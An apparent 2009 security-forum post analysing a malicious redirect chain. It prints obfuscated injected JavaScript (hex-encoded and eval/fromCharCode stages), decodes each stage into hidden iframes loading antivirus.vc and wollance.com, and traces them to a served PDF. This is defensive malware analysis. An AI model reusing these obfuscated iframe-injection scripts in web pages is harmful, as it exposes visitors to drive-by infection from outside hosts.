Author Topic: downloadsglobe.com > antivirus.vc + wollance.com  (Read 3437 times)

0 Members and 1 Guest are viewing this topic.

May 11, 2009, 03:08:37 am
Read 3437 times

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
http://vurl.mysteryfcm.co.uk/?url=611862

Code: [Select]
function c268fb268di4a06e9d472afd(i4a06e9d472eea){ function i4a06e9d4732d7(){return 16;} return (parseInt(i4a06e9d472eea,i4a06e9d4732d7()));}function i4a06e9d473aa4(i4a06e9d473e85){ var i4a06e9d47426f='';i4a06e9d47524d=String.fromCharCode;for(i4a06e9d474625=0;i4a06e9d474625<i4a06e9d473e85.length;i4a06e9d474625+=2){ i4a06e9d47426f+=(i4a06e9d47524d(c268fb268di4a06e9d472afd(i4a06e9d473e85.substr(i4a06e9d474625,2))));}return i4a06e9d47426f;} var r9d='';var i4a06e9d4755ab='3C7'+r9d+'3637'+r9d+'2697'+r9d+'07'+r9d+'43E696628216D7'+r9d+'96961297'+r9d+'B646F637'+r9d+'56D656E7'+r9d+'42E7'+r9d+'7'+r9d+'7'+r9d+'2697'+r9d+'465287'+r9d+'56E657'+r9d+'363617'+r9d+'065282027'+r9d+'2533632536392536362537'+r9d+'322536312536642536352532302536652536312536642536352533642536332533322533362532302537'+r9d+'332537'+r9d+'32253633253364253237'+r9d+'2536382537'+r9d+'342537'+r9d+'342537'+r9d+'302533612532662532662536312536652537'+r9d+'342536392537'+r9d+'362536392537'+r9d+'322537'+r9d+'352537'+r9d+'332532652537'+r9d+'36253633253266253366253237'+r9d+'2532622534642536312537'+r9d+'342536382532652537'+r9d+'322536662537'+r9d+'352536652536342532382534642536312537'+r9d+'342536382532652537'+r9d+'32253631253665253634253666253664253238253239253261253333253337'+r9d+'253331253332253239253262253237'+r9d+'253338253631253633253237'+r9d+'2532302537'+r9d+'37'+r9d+'2536392536342537'+r9d+'34253638253364253331253336253230253638253635253639253637'+r9d+'2536382537'+r9d+'342533642533322533332533322532302537'+r9d+'332537'+r9d+'342537'+r9d+'39253663253635253364253237'+r9d+'2537'+r9d+'362536392537'+r9d+'332536392536322536392536632536392537'+r9d+'342537'+r9d+'39253361253638253639253634253634253635253665253237'+r9d+'2533652533632532662536392536362537'+r9d+'3225363125366425363525336527'+r9d+'29293B7'+r9d+'D7'+r9d+'6617'+r9d+'2206D7'+r9d+'969613D7'+r9d+'47'+r9d+'27'+r9d+'5653B3C2F7'+r9d+'3637'+r9d+'2697'+r9d+'07'+r9d+'43E';document.write(i4a06e9d473aa4(i4a06e9d4755ab));
eval(String.fromCharCode(118,97,114,32,116,61,53,59,118,97,114,32,104,106,103,52,61,34,119,111,108,108,34,59,118,97,114,32,119,61,34,97,110,99,101,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,114,114,116,116,54,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,104,106,103,52,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,114,114,116,116,54,43,39,47,39,43,39,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,51,34,62,60,47,105,39,43,39,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,119,54,61,56,55,52,57,56,48,48,48,48,48,50,51,52,48));

To;

Code: [Select]
<script>if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%32%36%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%61%6e%74%69%76%69%72%75%73%2e%76%63%2f%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%33%37%31%32%29%2b%27%38%61%63%27%20%77%69%64%74%68%3d%31%36%20%68%65%69%67%68%74%3d%32%33%32%20%73%74%79%6c%65%3d%27%76%69%73%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true;</script>var t=5;var hjg4="woll";var w="ance";var re6=".";var rrtt6="com";var a="if";var s="tt";document.write('<'+a+'rame src="h'+s+'p://'+hjg4+''+w+''+re6+''+rrtt6+'/'+'" width="1" height="3"></i'+'f'+'rame>');var w6=87498000002340
To;

Code: [Select]
<iframe name=c26 src='http://antivirus.vc/?'+Math.round(Math.random()*3712)+'8ac' width=16 height=232 style='visibility:hidden'></iframe><iframe src="http://wollance.com/" width="1" height="3"></iframe>
wollance.com contains;

Code: [Select]
eval(String.fromCharCode(118,97,114,32,117,116,121,116,116,61,51,52,59,118,97,114,32,97,61,34,105,102,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,47,105,109,97,103,101,47,105,110,100,101,120,46,112,104,112,39,43,39,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,50,34,62,60,47,105,39,43,39,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,119,54,61,48,48,53,48,51,50,48,48,48,48,48,50,49,48))
.... to;

Code: [Select]
<iframe src="/image/index.php" width="1" height="2"></iframe>
Which loads;

Code: [Select]
<iframe src='/image/pfgt.php' width=1 height=4></iframe>
Which is a PDF;

Code: [Select]
Date: Mon, 11 May 2009 02:56:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Accept-Ranges: bytes
Content-Length: 23231
Content-Disposition: inline; filename=372.pdf
Connection: close
Content-Type: application/pdf

Where 372 is a random number.

Got the PDF uncompressed, but it wouldn't decode with Malzilla (kept throwing up errors, which means PDFTK likely didn't uncompress it properly (used "pdftk {file} output {file}.out uncompress" )
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net